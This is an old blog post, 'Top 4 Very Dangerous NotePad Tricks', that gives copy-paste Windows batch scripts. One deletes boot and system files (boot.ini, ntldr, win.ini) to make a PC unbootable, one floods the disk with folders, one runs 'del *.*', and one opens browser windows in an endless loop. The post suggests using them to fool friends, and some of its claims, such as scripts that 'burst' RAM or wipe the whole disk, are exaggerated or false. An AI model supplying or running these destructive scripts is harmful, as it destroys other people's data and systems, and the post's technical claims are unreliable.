t>

Sunday, 2 November 2014

Filled Under:

Top 4 Very Dangerous NotePad Tricks

Share
As you know Notepad can be used to make some dramatic changes in your windows PC by using simple programming. Here I am gonna share some very dangerous Notepad tricks. Sometimes these tricks make your PC dead for ever or make a ram burst. Anyway don’t try it for a fun
Caution: Do at your own risk, We are not responsible for any damages or losses occur due to this trick.

Shutdown Computer forever

Make a notepad file and copy paste the given codes in it.
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini
Save the file as “Shutdown-forever.bat”. Running this file make your computer Shutdown forever. So run it if you don’t care it.
Top 4 Very Dangerous NotePad Tricks

Numerous Folders with in a minute

This trick will make numerous folders in your computer with in a minute, this trick will burst your computer ram. So create a notepad file and copy paste given code
@echo off
:top
md %random%
goto top
Save in “.bat” format
You can fool your friend with this trick, but do at your own risk. It is not that much dangerous as first trick

Delete all your system

You can delete all files in your hard disc with in minutes. Make a notepad file with following code
del *.*
Save in “.bat” format
It will do the job with in minutes

Ram Crashing Trick

Just make a notepad file with the code
:A
start http://google.com/
goto A
It will Crash your ram soon
Caution: Do at your own risk, We are not responsible for any damages or losses occur due to this trick.
Hope you enjoyed this trick, share it to your friends and comment your opinions

0 comments:

Post a Comment